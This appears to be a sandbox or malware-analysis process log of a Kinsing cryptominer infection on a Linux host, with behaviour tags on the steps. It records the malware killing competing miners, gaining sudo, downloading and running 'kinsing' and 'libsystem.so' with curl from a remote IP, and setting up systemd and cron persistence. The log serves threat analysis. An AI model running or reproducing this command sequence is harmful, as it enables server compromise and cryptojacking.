/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1473
-
-
/bin/grepgrep exe4⤵PID:1476
-
-
/bin/lsls -latrh /proc/timer_list4⤵PID:1475
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1478
-
-
/bin/grepgrep exe4⤵PID:1481
-
-
/bin/lsls -latrh /proc/tty4⤵PID:1480
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1483
-
-
/bin/grepgrep exe4⤵PID:1486
-
-
/bin/lsls -latrh /proc/uptime4⤵PID:1485
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1488
-
-
/bin/grepgrep exe4⤵PID:1491
-
-
/bin/lsls -latrh /proc/version4⤵PID:1490
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1493
-
-
/bin/grepgrep exe4⤵PID:1496
-
-
/bin/lsls -latrh /proc/vmallocinfo4⤵PID:1495
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1498
-
-
/bin/grepgrep exe4⤵PID:1501
-
-
/bin/lsls -latrh /proc/vmstat4⤵PID:1500
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1503
-
-
/bin/grepgrep exe4⤵PID:1506
-
-
/bin/lsls -latrh /proc/zoneinfo4⤵PID:1505
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1508
-
-
/usr/bin/idid -u4⤵PID:1509
-
-
/usr/bin/sudosudo mkdir /etc/data4⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:1510 -
/usr/sbin/sendmailsendmail -t5⤵PID:1513
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmOZI-0000OP-Gr6⤵
- Reads CPU attributes
PID:1526
-
-
-
/usr/sbin/sendmailsendmail -t5⤵PID:1516
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmOZI-0000OS-Go6⤵
- Reads CPU attributes
PID:1527
-
-
-
/bin/mkdirmkdir /etc/data5⤵PID:1517
-
-
-
/usr/bin/idid -u4⤵PID:1518
-
-
/bin/unameuname -i4⤵
- Attempts to change immutable files
PID:1519
-
-
/bin/unameuname -m4⤵PID:1520
-
-
/bin/lsls -la /etc/data4⤵PID:1522
-
-
/bin/grepgrep -e /dev4⤵PID:1523
-
-
/bin/grepgrep -v grep4⤵PID:1524
-
-
/usr/bin/pkillpkill -f sshd4⤵PID:1525
-
-
/usr/bin/pkillpkill -f htop4⤵
- Reads CPU attributes
PID:1528
-
-
/usr/bin/pkillpkill -f linuxsys4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1530
-
-
/usr/bin/pkillpkill -f kthreaddo4⤵
- Reads CPU attributes
PID:1531
-
-
/usr/bin/pkillpkill -f donkey4⤵
- Reads CPU attributes
PID:1532
-
-
/usr/bin/pkillpkill -f sysupdater4⤵PID:1533
-
-
/usr/bin/pkillpkill -f php-update.service4⤵
- Reads CPU attributes
PID:1536
-
-
/usr/bin/pkillpkill -f update-setup4⤵
- Reads CPU attributes
PID:1537
-
-
/bin/grepgrep -v -4⤵PID:1542
-
-
/bin/grepgrep :14144⤵PID:1539
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1543
-
-
/usr/bin/awkawk "{print \$7}"4⤵PID:1540
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"4⤵PID:1541
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1548
-
-
/bin/grepgrep -v grep4⤵PID:1546
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:1547
-
-
/bin/grepgrep rtw88_pcied4⤵PID:1545
-
-
/bin/psps ax4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1544
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:1552
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1553
-
-
/bin/grepgrep -v grep4⤵PID:1551
-
-
/bin/grepgrep stratum4⤵PID:1550
-
-
/bin/psps ax4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1549
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1558
-
-
/bin/grepgrep -v grep4⤵PID:1556
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:1557
-
-
/bin/grepgrep Sofia4⤵PID:1555
-
-
/bin/psps ax4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1554
-
-
/usr/bin/pkillpkill -f Sofia4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1559
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1564
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1563
-
-
/bin/grepgrep -v grep4⤵PID:1562
-
-
/bin/grepgrep tracepath4⤵PID:1561
-
-
/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1560
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1569
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1568
-
-
/bin/grepgrep -v grep4⤵PID:1567
-
-
/bin/grepgrep /dot4⤵PID:1566
-
-
/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1565
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1573
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1574
-
-
/bin/grepgrep -v grep4⤵PID:1572
-
-
/bin/grepgrep "php-fpm pool www"4⤵PID:1571
-
-
/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1570
-
-
/bin/grepgrep -v grep4⤵PID:1577
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1578
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1579
-
-
/bin/grepgrep "Cli start accept"4⤵PID:1576
-
-
/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1575
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1584
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1583
-
-
/bin/grepgrep -v grep4⤵PID:1582
-
-
/bin/grepgrep "bash -k"4⤵PID:1581
-
-
/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
PID:1580
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1589
-
-
/bin/grepgrep -v grep4⤵PID:1587
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1588
-
-
/bin/grepgrep perfctl4⤵PID:1586
-
-
/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
PID:1585
-
-
/usr/bin/pkillpkill -f hezb4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1590
-
-
/usr/bin/pkillpkill -f /tmp/.out4⤵
- Reads CPU attributes
PID:1591
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1596
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1595
-
-
/bin/grepgrep -v grep4⤵PID:1594
-
-
/bin/grepgrep ./ll14⤵PID:1593
-
-
/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1592
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1601
-
-
/bin/grepgrep -v grep4⤵PID:1599
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"4⤵PID:1600
-
-
/bin/grepgrep agetty4⤵PID:1598
-
-
/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1597
-
-
/usr/bin/pkillpkill -f 42.112.28.2164⤵
- Reads CPU attributes
- Reads runtime system information
PID:1602
-
-
/bin/grepgrep -v -4⤵PID:1607
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"4⤵PID:1606
-
-
/usr/bin/awkawk "{print \$7}"4⤵PID:1605
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1608
-
-
/bin/grepgrep 207.38.87.64⤵PID:1604
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"4⤵PID:1612
-
-
/bin/grepgrep -v -4⤵PID:1613
-
-
/usr/bin/awkawk "{print \$7}"4⤵PID:1611
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1614
-
-
/bin/grepgrep 23.94.214.1194⤵PID:1610
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"4⤵PID:1618
-
-
/usr/bin/awkawk "{print \$7}"4⤵PID:1617
-
-
/bin/grepgrep -v -4⤵PID:1619
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1620
-
-
/bin/grepgrep 127.0.0.1:520184⤵PID:1616
-
-
/bin/grepgrep -v -4⤵PID:1625
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"4⤵PID:1624
-
-
/usr/bin/awkawk "{print \$7}"4⤵PID:1623
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1626
-
-
/bin/grepgrep 34.81.218.76:94864⤵PID:1622
-
-
/bin/grepgrep -v -4⤵PID:1631
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"4⤵PID:1630
-
-
/usr/bin/awkawk "{print \$7}"4⤵PID:1629
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1632
-
-
/bin/grepgrep 42.112.28.216:94864⤵PID:1628
-
-
/usr/bin/pkillpkill -f .git/kthreaddw4⤵
- Reads CPU attributes
PID:1633
-
-
/usr/bin/pkillpkill -f 80.211.206.1054⤵
- Reads CPU attributes
- Reads runtime system information
PID:1634
-
-
/usr/bin/pkillpkill -f 207.38.87.64⤵
- Reads CPU attributes
- Reads runtime system information
PID:1635
-
-
/usr/bin/pkillpkill -f p84444⤵
- Reads CPU attributes
- Reads runtime system information
PID:1636
-
-
/usr/bin/pkillpkill -f supportxmr4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1637
-
-
/usr/bin/pkillpkill -f monero4⤵
- Reads CPU attributes
PID:1638
-
-
/usr/bin/pkillpkill -f kthreaddi4⤵
- Reads CPU attributes
PID:1639
-
-
/usr/bin/pkillpkill -f srv004⤵PID:1640
-
-
/usr/bin/pkillpkill -f /tmp/.javae/javae4⤵
- Reads CPU attributes
PID:1641
-
-
/usr/bin/pkillpkill -f .javae4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1642
-
-
/usr/bin/pkillpkill -f .syna4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1643
-
-
/usr/bin/pkillpkill -f xmm4⤵
- Reads CPU attributes
PID:1644
-
-
/usr/bin/pkillpkill -f solr.sh4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1645
-
-
/usr/bin/pkillpkill -f /tmp/.solr/solrd4⤵
- Reads CPU attributes
PID:1646
-
-
/usr/bin/pkillpkill -f /tmp/javac4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1647
-
-
/usr/bin/pkillpkill -f /tmp/.go.sh4⤵
- Reads CPU attributes
PID:1648
-
-
/usr/bin/pkillpkill -f /tmp/.x/agetty4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1649
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker4⤵
- Reads CPU attributes
PID:1650
-
-
/usr/bin/pkillpkill -f c3pool4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1651
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/gitag-ssh4⤵PID:1652
-
-
/usr/bin/pkillpkill -f /tmp/14⤵
- Reads CPU attributes
PID:1653
-
-
/usr/bin/pkillpkill -f /tmp/okk.sh4⤵
- Reads CPU attributes
PID:1654
-
-
/usr/bin/pkillpkill -f /tmp/gitaly4⤵
- Reads CPU attributes
PID:1655
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker4⤵
- Reads CPU attributes
PID:1656
-
-
/usr/bin/pkillpkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB4⤵
- Reads runtime system information
PID:1657
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/supervise4⤵
- Reads CPU attributes
PID:1658
-
-
/usr/bin/pkillpkill -f /tmp/.ssh/redis.sh4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1659
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1663
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1664
-
-
/bin/grepgrep -v grep4⤵PID:1662
-
-
/bin/grepgrep ./udp4⤵PID:1661
-
-
/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1660
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/014⤵
- Attempts to change immutable files
PID:1665
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1667
-
-
/bin/catcat /tmp/.X11-unix/014⤵PID:1666
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/114⤵
- Attempts to change immutable files
PID:1668
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1670
-
-
/bin/catcat /tmp/.X11-unix/114⤵PID:1669
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/224⤵
- Attempts to change immutable files
PID:1671
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1673
-
-
/bin/catcat /tmp/.X11-unix/224⤵PID:1672
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.14⤵
- Attempts to change immutable files
PID:1674
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1676
-
-
/bin/catcat /tmp/.systemd.14⤵PID:1675
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.24⤵
- Attempts to change immutable files
PID:1677
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1679
-
-
/bin/catcat /tmp/.systemd.24⤵PID:1678
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.34⤵
- Attempts to change immutable files
PID:1680
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1682
-
-
/bin/catcat /tmp/.systemd.34⤵PID:1681
-
-
/bin/catcat /tmp/.systemd.14⤵PID:1683
-
-
/bin/catcat /tmp/.systemd.24⤵PID:1684
-
-
/bin/catcat /tmp/.systemd.34⤵PID:1685
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.04⤵
- Attempts to change immutable files
PID:1686
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1688
-
-
/bin/catcat /tmp/.pg_stat.04⤵PID:1687
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.14⤵
- Attempts to change immutable files
PID:1689
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1691
-
-
/bin/catcat /tmp/.pg_stat.14⤵PID:1690
-
-
/bin/sedsed -i "s/^0//" /root/data/./oka.pid4⤵
- Attempts to change immutable files
PID:1692
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1694
-
-
/bin/catcat /root/data/./oka.pid4⤵PID:1693
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/d4⤵
- Attempts to change immutable files
PID:1695
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1697
-
-
/bin/catcat /tmp/.ICE-unix/d4⤵PID:1696
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/m4⤵
- Attempts to change immutable files
PID:1698
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1700
-
-
/bin/catcat /tmp/.ICE-unix/m4⤵PID:1699
-
-
/usr/bin/pkillpkill -f zsvc4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1701
-
-
/usr/bin/pkillpkill -f pdefenderd4⤵
- Reads CPU attributes
PID:1702
-
-
/usr/bin/pkillpkill -f updatecheckerd4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1703
-
-
/usr/bin/pkillpkill -f cruner4⤵
- Reads CPU attributes
PID:1704
-
-
/usr/bin/pkillpkill -f dbused4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1705
-
-
/usr/bin/pkillpkill -f bashirc4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1706
-
-
/usr/bin/pkillpkill -f meminitsrv4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1707
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1712
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1711
-
-
/bin/grepgrep -v grep4⤵PID:1710
-
-
/bin/grepgrep ./oka4⤵PID:1709
-
-
/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
PID:1708
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1716
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1717
-
-
/bin/grepgrep -v grep4⤵PID:1715
-
-
/bin/grepgrep "postgres: autovacum"4⤵PID:1714
-
-
/bin/psps aux4⤵
- Process Discovery
- Reads runtime system information
PID:1713
-
-
/bin/grepgrep -v "\\["4⤵PID:1721
-
-
/bin/grepgrep -v "("4⤵PID:1722
-
-
/bin/grepgrep -v bin4⤵PID:1720
-
-
/bin/grepgrep -v php-fpm4⤵PID:1723
-
-
/usr/bin/awkawk "length(\$1) == 8"4⤵PID:1719
-
-
/bin/grepgrep -v proxymap4⤵PID:1724
-
-
/bin/psps ax -o "command,pid" -www4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1718
-
-
/bin/grepgrep -v postgres4⤵PID:1725
-
-
/bin/grepgrep -v postgrey4⤵PID:1726
-
-
/bin/grepgrep -v kinsing4⤵PID:1727
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1728
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
- Reads runtime system information
PID:1729
-
-
/bin/grepgrep -v "("4⤵PID:1734
-
-
/bin/grepgrep -v "\\["4⤵PID:1733
-
-
/bin/grepgrep -v bin4⤵PID:1732
-
-
/bin/grepgrep -v php-fpm4⤵PID:1735
-
-
/usr/bin/awkawk "length(\$1) == 16"4⤵PID:1731
-
-
/bin/grepgrep -v proxymap4⤵PID:1736
-
-
/bin/psps ax -o "command,pid" -www4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1730
-
-
/bin/grepgrep -v postgres4⤵PID:1737
-
-
/bin/grepgrep -v postgrey4⤵PID:1738
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1739
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1740
-
-
/bin/grepgrep -v bin4⤵PID:1743
-
-
/bin/grepgrep -v "("4⤵PID:1745
-
-
/usr/bin/awkawk "length(\$5) == 8"4⤵PID:1742
-
-
/bin/grepgrep -v "\\["4⤵PID:1744
-
-
/bin/grepgrep -v php-fpm4⤵PID:1746
-
-
/bin/grepgrep -v proxymap4⤵PID:1747
-
-
/bin/psps ax4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1741
-
-
/bin/grepgrep -v postgres4⤵PID:1748
-
-
/bin/grepgrep -v postgrey4⤵PID:1749
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:1750
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1751
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"4⤵
- Attempts to change immutable files
PID:1756
-
-
/usr/bin/awkawk "{print \$2}"4⤵PID:1755
-
-
/bin/grepgrep /tmp/sscks4⤵PID:1754
-
-
/bin/grepgrep -v grep4⤵PID:1753
-
-
/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1752
-
-
/usr/bin/awkawk "{ print \$1 }"4⤵PID:1760
-
-
/usr/bin/md5summd5sum /etc/data/kinsing4⤵PID:1759
-
-
/bin/rmrm -rf /etc/data/kinsing4⤵PID:1761
-
-
/bin/chmodchmod 777 /etc/data/kinsing4⤵
- File and Directory Permissions Modification
PID:1762
-
-
/usr/bin/curlcurl -o /etc/data/kinsing http://194.38.22.120/kinsing4⤵PID:1763
-
-
/bin/chmodchmod +x /etc/data/kinsing4⤵
- File and Directory Permissions Modification
PID:1764
-
-
/usr/bin/md5summd5sum /etc/data/kinsing4⤵PID:1767
-
-
/usr/bin/awkawk "{ print \$1 }"4⤵PID:1768
-
-
/usr/bin/awkawk "{ print \$1 }"4⤵PID:1772
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so4⤵PID:1771
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so4⤵
- File and Directory Permissions Modification
PID:1773
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so4⤵PID:1774
-
-
/bin/chmodchmod +x /etc/data/libsystem.so4⤵
- File and Directory Permissions Modification
PID:1775
-
-
/usr/bin/awkawk "{ print \$1 }"4⤵PID:1779
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so4⤵PID:1778
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so4⤵
- File and Directory Permissions Modification
PID:1780
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so4⤵PID:1781
-
-
/bin/chmodchmod +x /etc/data/libsystem.so4⤵
- File and Directory Permissions Modification
PID:1782
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so4⤵PID:1785
-
-
/usr/bin/awkawk "{ print \$1 }"4⤵PID:1786
-
-
/bin/rmrm -rf /tmp/kdevtmpfsi4⤵PID:1787
-
-
/bin/chmodchmod 777 /etc/data/kinsing4⤵
- File and Directory Permissions Modification
PID:1788
-
-
/bin/chmodchmod +x /etc/data/kinsing4⤵
- File and Directory Permissions Modification
PID:1789
-
-
/etc/data/kinsing/etc/data/kinsing4⤵PID:1790
-
-
/usr/bin/idid -u4⤵PID:1792
-
-
/bin/systemctlsystemctl enable bot4⤵
- Enumerates kernel/hardware configuration
PID:1793
-
-
/bin/systemctlsystemctl start bot4⤵
- Enumerates kernel/hardware configuration
PID:1806
-
-
/bin/sedsed /base64/d4⤵PID:1811
-
-
/usr/bin/crontabcrontab -l4⤵PID:1810
-
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1812
-
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1815
-
-
/bin/sedsed /_cron/d4⤵PID:1814
-
-
/usr/bin/crontabcrontab -l4⤵PID:1813
-
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1818
-
-
/bin/sedsed /31.210.20.181/d4⤵PID:1817
-
-
/usr/bin/crontabcrontab -l4⤵PID:1816
-
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1821
-
-
/bin/sedsed /update.sh/d4⤵PID:1820
-
-
/usr/bin/crontabcrontab -l4⤵PID:1819
-
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1824
-
-
/bin/sedsed /logo4/d4⤵PID:1823
-
-
/usr/bin/crontabcrontab -l4⤵PID:1822
-
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1827
-
-
/bin/sedsed /logo9/d4⤵PID:1826
-
-
/usr/bin/crontabcrontab -l4⤵PID:1825
-
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1830
-
-
/bin/sedsed /logo0/d4⤵PID:1829
-
-
/usr/bin/crontabcrontab -l4⤵PID:1828
-
-
/bin/sedsed /logo/d4⤵PID:1832
-
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1833
-
-
/usr/bin/crontabcrontab -l4⤵PID:1831
-
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
